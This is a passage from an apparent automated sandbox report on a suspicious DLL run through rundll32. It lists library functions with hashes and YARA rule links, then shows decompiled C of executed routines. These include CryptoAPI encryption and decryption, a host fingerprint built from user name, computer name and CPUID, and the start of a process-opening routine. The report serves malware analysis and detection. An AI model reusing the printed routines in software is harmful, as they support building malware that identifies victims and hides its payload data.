                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB97D2
                                • _free.LIBCMT ref: 6DDB97E4
                                • _free.LIBCMT ref: 6DDB97F6
                                • _free.LIBCMT ref: 6DDB9808
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: f43492f0883cc7431bc8f3491e9ef7458db1279a4f24667c230d5de166423754
                                • Instruction ID: 5a61ae4abad4f5f1db1a6a929a86d00980e25dbcd89aa0c6244f78b0aa3098e3
                                • Opcode Fuzzy Hash: f43492f0883cc7431bc8f3491e9ef7458db1279a4f24667c230d5de166423754
                                • Instruction Fuzzy Hash: 76F0AF71609646DBDA24FB18D1C0C2B37FDEE85314B664809F81AD3481DB30F8818AA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD90230, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 6DD90255
                                • CatchIt.LIBVCRUNTIME ref: 6DD9033B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: CatchEncodePointer
                                • String ID: MOC$RCC
                                • API String ID: 1435073870-2084237596
                                • Opcode ID: 89defa2fa5fcfe6b8e9a241891fa1077493cf48c9ce53a6c41390c7996850a3f
                                • Instruction ID: f0b59f21df0f81a911d5749ed3a5a4d13e2048add907801ff79221b95b303389
                                • Opcode Fuzzy Hash: 89defa2fa5fcfe6b8e9a241891fa1077493cf48c9ce53a6c41390c7996850a3f
                                • Instruction Fuzzy Hash: DF418A7190020AEFCF12DF95DD80AFE7BB5FF48344F158058FA18AA222D336A950DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8F3C4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • __is_exception_typeof.LIBVCRUNTIME ref: 6DD8F458
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: __is_exception_typeof
                                • String ID: MOC$RCC$csm
                                • API String ID: 3140442014-2671469338
                                • Opcode ID: 78bd7d3eb404c3b0222743a862b53eeadeaaa1f5dcee37f89387ef9c5c13baf1
                                • Instruction ID: 6ee7f7879d732d02d53fc7af0dc627efe40320b90e365dc419e119c61e54fc44
                                • Opcode Fuzzy Hash: 78bd7d3eb404c3b0222743a862b53eeadeaaa1f5dcee37f89387ef9c5c13baf1
                                • Instruction Fuzzy Hash: 4F118231518316DFD716AF78C440BB9B7A8EF40325F22409AF9419B263D7B4E940CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB6E99, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                • Opcode ID: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
                                • Instruction ID: e1084c0e2139fc65aa174cf2c1868d1d66c4131ad973f93757946bc7d78fa095
                                • Opcode Fuzzy Hash: 869dc4886e6a6f5b561d51b04d4c0ce346a2230bcee0f7184eb0f62dba287ef0
                                • Instruction Fuzzy Hash: 12B149B1D04346BFDB11EF68C8807AEBBF5EF45348F14916AF4969F241D6348902CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD938E5, Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 6DD938EC
                                • UnDecorator::getSymbolName.LIBCMT ref: 6DD9397A
                                • DName::operator+.LIBCMT ref: 6DD93A7E
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::DName.LIBVCRUNTIME ref: 6DD93B3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
                                • String ID:
                                • API String ID: 334624791-0
                                • Opcode ID: 6a14ab10ca3fa303335d94a8ba1d59630f7cab2c0f3ead4dd72faf6098fd34d8
                                • Instruction ID: 736325f23eef834fbcf434f02f7642a774d9279fab24b273c5b845c54d193eb4
                                • Opcode Fuzzy Hash: 6a14ab10ca3fa303335d94a8ba1d59630f7cab2c0f3ead4dd72faf6098fd34d8
                                • Instruction Fuzzy Hash: 39814E71D0424ADFDF05EF98C444BEEBBB9BB09314F05805AE559AF241D736A941CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8FC23, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                • Opcode ID: 98f289ccc5abcb6d13e1817fff56553bdb069ea4f9b2efeb05131dbac0f76952
                                • Instruction ID: ece065f68b0e526a2c36e0b948fb3dbd88bf2b8fd25b22263040688d0c27c3b0
                                • Opcode Fuzzy Hash: 98f289ccc5abcb6d13e1817fff56553bdb069ea4f9b2efeb05131dbac0f76952
                                • Instruction Fuzzy Hash: AB51AD72608603EFDB16AF75D880BBAB7A4EF05710F114529FE514B1A3E771A981CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD93F92, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                • DName::DName.LIBVCRUNTIME ref: 6DD9401A
                                  • Part of subcall function 6DD91130: __aulldvrm.LIBCMT ref: 6DD91161
                                • DName::operator+.LIBCMT ref: 6DD94027
                                • DName::operator=.LIBVCRUNTIME ref: 6DD940A7
                                • DName::DName.LIBVCRUNTIME ref: 6DD940C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
                                • String ID:
                                • API String ID: 2448499823-0
                                • Opcode ID: 966079469f2e24f0639b5ee09dd19d919adeaac971d8ed03c10e74ab6d1ad6a5
                                • Instruction ID: 5d1ad9bf3ce5c2b7d9b1ad6d1c4ae6b147aabbc931f216c99451fa647933dd93
                                • Opcode Fuzzy Hash: 966079469f2e24f0639b5ee09dd19d919adeaac971d8ed03c10e74ab6d1ad6a5
                                • Instruction Fuzzy Hash: 7A51C370940216DFDB05EF98C950AAEBBB4FF0A304F018196F565AF392C3729A41CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9F035, Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 439e2332e7c1105ead18b65a909cbda90204da4aa1541d1b4856dec98efde17d
                                • Instruction ID: 1674f4f47e382a6bc1e745a4961741a8cc72958e24beb51d80fd5a9e81354d00
                                • Opcode Fuzzy Hash: 439e2332e7c1105ead18b65a909cbda90204da4aa1541d1b4856dec98efde17d
                                • Instruction Fuzzy Hash: CC4116B2A44709BFE715AF78CC41B9ABBBDEB88710F10852AF155DF380D7B299408790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB0B42, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 324bacbac8c2883e051fa75410471dd0daa430012dcd4bb0e78743483a87f1fb
                                • Instruction ID: d25adae9a4b8b6eeacc216ca3c275627bbb837921915c4d7387f1f9b68a02e33
                                • Opcode Fuzzy Hash: 324bacbac8c2883e051fa75410471dd0daa430012dcd4bb0e78743483a87f1fb
                                • Instruction Fuzzy Hash: B921D8B1945222EBDB227B2A8E40B3B3768AB477ECF114510FD57A7282D730F800C9E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDADDF6, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,6DDBDD5B,00000000,00000001,6DDB57FE,?,6DDBE22B,00000001,?,?,?,6DDB55A5,?,00000000), ref: 6DDADDFB
                                • _free.LIBCMT ref: 6DDADE58
                                • _free.LIBCMT ref: 6DDADE8E
                                • SetLastError.KERNEL32(00000000,6DDCB05C,000000FF,?,6DDBE22B,00000001,?,?,?,6DDB55A5,?,00000000,00000000,6DDCA818,0000002C,6DDB57FE), ref: 6DDADE99
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                • Opcode ID: ffe468ebaef8ec5b51c870c652b95dd2a988f23c918efc610f88e30ea5568767
                                • Instruction ID: c5fd31f763d17361b88d299bd599d5867fb61ff66a5c3998d332faa1bfc733c4
                                • Opcode Fuzzy Hash: ffe468ebaef8ec5b51c870c652b95dd2a988f23c918efc610f88e30ea5568767
                                • Instruction Fuzzy Hash: F111987264D102AADB1137E9DC80A3B36A997DB678B2A8125FB74861C1FF25CD095170
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDADF4D, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,6DDAD6F8,6DDB0144,?,?,6DD8DC30,?,?,6DD8C69D,000008DA,6DDCB004), ref: 6DDADF52
                                • _free.LIBCMT ref: 6DDADFAF
                                • _free.LIBCMT ref: 6DDADFE5
                                • SetLastError.KERNEL32(00000000,6DDCB05C,000000FF,?,?,?,6DDAD6F8,6DDB0144,?,?,6DD8DC30,?,?,6DD8C69D,000008DA,6DDCB004), ref: 6DDADFF0
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                • Opcode ID: 14bbd1c4a749bd9e4c2b41c637eae00a307822c2b92e22ed81b0e8adeb036422
                                • Instruction ID: 815cf136e0832630ceeb9e3140b848b3c70cd0ac788b45e20189161dc6dbf101
                                • Opcode Fuzzy Hash: 14bbd1c4a749bd9e4c2b41c637eae00a307822c2b92e22ed81b0e8adeb036422
                                • Instruction Fuzzy Hash: 3011777264D142AED7113779CC84E7B37699BCB67CB2A8225FA25821C1FF31C80D5170
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9744F, Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,6DD97510,00000000,?,00000001,?,?,6DD97643,00000001,6DD42674,6DD4266C,6DD42674), ref: 6DD974DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 08dff18af764a6ed295102061d1f1a034d85506a6a031c20a637a64bb655cff5
                                • Instruction ID: 66248582cefaa23e19f8216337dedcf8ddbb27700b9787d0b93b6c5cba66e2a3
                                • Opcode Fuzzy Hash: 08dff18af764a6ed295102061d1f1a034d85506a6a031c20a637a64bb655cff5
                                • Instruction Fuzzy Hash: 21118631E45622FBDB22BB689C44B6A3BBCAF42774F154610FE54EF282D771E90086D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDC3B2A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • WriteConsoleW.KERNEL32(?,?,6DDB57FE,00000000,?,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001), ref: 6DDC3B41
                                • GetLastError.KERNEL32(?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000,00000001,?,6DDBE24F,6DDB55A5), ref: 6DDC3B4D
                                  • Part of subcall function 6DDC3B13: CloseHandle.KERNEL32(6DDCB940,6DDC3B5D,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000,00000001), ref: 6DDC3B23
                                • ___initconout.LIBCMT ref: 6DDC3B5D
                                  • Part of subcall function 6DDC3AD5: CreateFileW.KERNEL32(6DD47E28,40000000,00000003,00000000,00000003,00000000,00000000,6DDC3B04,6DDC299A,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000), ref: 6DDC3AE8
                                • WriteConsoleW.KERNEL32(?,?,6DDB57FE,00000000,?,6DDC29AD,?,00000001,?,00000001,?,6DDBDCEA,00000000,00000000,00000001,00000000), ref: 6DDC3B72
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                • Opcode ID: 4167f758510ce01af4ea4aa259ac33567d36a713c1d902123440c6d2b1aa9b60
                                • Instruction ID: b61d9a5be7fa38cc9ba2420bb657b3409cce45d52c572b1d094abe135c3bbeff
                                • Opcode Fuzzy Hash: 4167f758510ce01af4ea4aa259ac33567d36a713c1d902123440c6d2b1aa9b60
                                • Instruction Fuzzy Hash: D7F0AC3654515ABBCF662F95CC08B9A3F7AEB0A3A1F054010FF1996160DB32D820EFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA2273, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                • API String ID: 0-1872383224
                                • Opcode ID: 7f4c4d3ffb9c04bbd2d439ff0becbd9b38e84259d12fa8b832658a734e9b701d
                                • Instruction ID: 4a92dee888f142bc774ddc3dd79c1b01fae3a6a7bee27830d6aae2c846ada9dc
                                • Opcode Fuzzy Hash: 7f4c4d3ffb9c04bbd2d439ff0becbd9b38e84259d12fa8b832658a734e9b701d
                                • Instruction Fuzzy Hash: D7417671A04215EFDB21FB9BCC80D9EBFB9EB86318F19806AF50497241D7709A41C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA11AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 6DDA1207
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6DDA122D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID: $KL
                                • API String ID: 1992179935-2900536411
                                • Opcode ID: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
                                • Instruction ID: 6d14439b4731b797c3e4b4c1402c5dc2db0a33a9128b350afe14205a032ea186
                                • Opcode Fuzzy Hash: 4a7cf78e14aefecc5d7fe0d642392f834ed758bf7f7f337a80a50e73d88b6ed3
                                • Instruction Fuzzy Hash: E211A172914218BEDB11FF68CC41FEE76B8EB82758F1AC469F441B7140D374AA408665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 5652 Parent PID: 4196 rundll32.exeCOMMON

                                Executed Functions

                                Function 046139C5, Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E046139C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x461a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x461a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04616837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x461a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E046150CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                0x046139ce
                                0x046139d4
                                0x046139d7
                                0x046139dd
                                0x046139dd
                                0x046139df
                                0x046139e1
                                0x046139e4
                                0x046139ea
                                0x046139eb
                                0x046139ec
                                0x046139f2
                                0x046139f7
                                0x046139fd
                                0x04613a05
                                0x04613b62
                                0x04613a0b
                                0x04613a0d
                                0x04613a16
                                0x04613a1b
                                0x04613a2d
                                0x04613a30
                                0x04613a34
                                0x04613a3b
                                0x04613a3f
                                0x04613a47
                                0x04613b4d
                                0x04613a4d
                                0x04613a4d
                                0x04613a51
                                0x04613a52
                                0x04613a54
                                0x04613a5f
                                0x04613b39
                                0x04613a65
                                0x04613a65
                                0x04613a68
                                0x04613a6e
                                0x04613a74
                                0x04613a74
                                0x04613a7c
                                0x04613a80
                                0x04613a83
                                0x04613b2a
                                0x04613a89
                                0x04613a8f
                                0x04613a92
                                0x04613a95
                                0x04613a97
                                0x04613a9a
                                0x04613a9d
                                0x04613a9f
                                0x04613a9f
                                0x04613aa9
                                0x04613aae
                                0x04613ab1
                                0x04613ab4
                                0x04613ab6
                                0x04613abf
                                0x04613ae9
                                0x04613ac1
                                0x04613ad2
                                0x04613ad2
                                0x04613af1
                                0x00000000
                                0x00000000
                                0x04613af3
                                0x04613af6
                                0x04613af9
                                0x04613afd
                                0x00000000
                                0x04613aff
                                0x04613b0e
                                0x04613b14
                                0x04613b1c
                                0x04613b1c
                                0x00000000
                                0x04613afd
                                0x04613b01
                                0x04613b09
                                0x04613b0c
                                0x04613b23
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04613b0c
                                0x04613a83
                                0x04613b3c
                                0x04613b3f
                                0x04613b3f
                                0x04613b54
                                0x04613b54
                                0x04613b6c

                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04614A23,00000001,046170D9,00000000), ref: 046139FD
                                • memcpy.NTDLL(04614A23,046170D9,00000010,?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000), ref: 04613A16
                                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04613A3F
                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04613A57
                                • memcpy.NTDLL(00000000,00000000,053C9630,00000010), ref: 04613AA9
                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,053C9630,00000020,?,?,00000010), ref: 04613AD2
                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,053C9630,?,?,00000010), ref: 04613AE9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04613B01
                                • GetLastError.KERNEL32 ref: 04613B33
                                • CryptDestroyKey.ADVAPI32(00000000), ref: 04613B3F
                                • GetLastError.KERNEL32 ref: 04613B47
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04613B54
                                • GetLastError.KERNEL32(?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04613B5C
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                • String ID:
                                • API String ID: 1967744295-0
                                • Opcode ID: 7b7e0b48c1f3c21cf3b02ed2c67a4d7127030ab197ea4cd11118219268adb288
                                • Instruction ID: a9948c46f6967b3ec7bf16ddc05f4f7befc7abb22212e6e9648393c5af00c568
                                • Opcode Fuzzy Hash: 7b7e0b48c1f3c21cf3b02ed2c67a4d7127030ab197ea4cd11118219268adb288
                                • Instruction Fuzzy Hash: 4E515171900208FFEF10DFA5D884EAEBBB9EB14355F08842AF905E6260F7759E54DB21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614454, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E04614454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x461a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0461143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x461a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x461a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0461283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x461a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x461a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0461283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x461a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                0x04614454
                                0x0461445c
                                0x04614462
                                0x04614465
                                0x04614468
                                0x0461446a
                                0x0461446f
                                0x0461446f
                                0x04614475
                                0x04614477
                                0x04614484
                                0x046144e5
                                0x04614486
                                0x0461448b
                                0x04614491
                                0x04614496
                                0x046144a4
                                0x046144a8
                                0x046144b7
                                0x046144be
                                0x046144c5
                                0x046144c5
                                0x046144d0
                                0x046144d0
                                0x046144a8
                                0x04614496
                                0x046144e7
                                0x046144ed
                                0x046144f7
                                0x046144f9
                                0x046144fe
                                0x0461450d
                                0x04614511
                                0x0461451c
                                0x04614523
                                0x0461452a
                                0x0461452a
                                0x04614536
                                0x04614536
                                0x04614511
                                0x0461453f
                                0x04614541
                                0x04614544
                                0x04614546
                                0x04614549
                                0x0461454c
                                0x04614556
                                0x0461455a
                                0x0461455e

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,046155CE), ref: 0461448B
                                • RtlAllocateHeap.NTDLL(00000000,046155CE), ref: 046144A2
                                • GetUserNameW.ADVAPI32(00000000,046155CE), ref: 046144AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,046155CE,?,?,?,?,?,04616BD8,?,00000001), ref: 046144D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 046144F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0461450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04614518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04614536
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: db5b9ca4e828bda34eb45b386cd6e289acfc2faf2c7251191ab7465835adfda9
                                • Instruction ID: 317342ee9c8414c1bcf9e7d04f4b3f0eeac6932016f623d63aac6d4bd46af9ca
                                • Opcode Fuzzy Hash: db5b9ca4e828bda34eb45b386cd6e289acfc2faf2c7251191ab7465835adfda9
                                • Instruction Fuzzy Hash: F3311972A00209AFDB11DFA9D980A6EB7F9FF58714F19446AE545D3220EB39EE04DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612D06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E04612D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
